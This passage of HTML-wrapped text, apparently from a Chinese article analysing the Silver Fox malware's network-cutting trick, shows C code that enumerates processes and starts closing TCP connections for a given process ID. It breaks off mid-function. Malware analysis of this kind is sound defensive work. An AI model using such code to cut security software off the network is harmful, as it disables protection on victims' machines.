11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">while</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">Process32NextW</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">snapshot, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&amp;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">pe</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">));</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">CloseHandle</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">snapshot</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">return</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> pids</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DataTypeTok&#39;;color: #902000;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">void</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> CloseTcpConnectionsByPid</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">DWORD pid</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">DWORD size </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DecValTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">PMIB_TCPTABLE2 tcpTable </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;KeywordTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">nullptr</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">if</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">GetTcpTable2</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;KeywordTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">nullptr, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&amp;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">size, TRUE</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">!=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> ERROR_INSUFFICIENT_BUFFER</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span><span leaf="">wprintf</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">L&#34;[!] Failed to query TCP table size.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;SpecialCharTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">\n</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&#34;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">return</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">tcpTable </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">PMIB_TCPTABLE2</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">malloc</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">size</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">if</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(!</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">tcpTable</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span><span leaf="">wprintf</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">L&#34;[!] Memory allocation failed.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;SpecialCharTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">\n</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&#34;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span 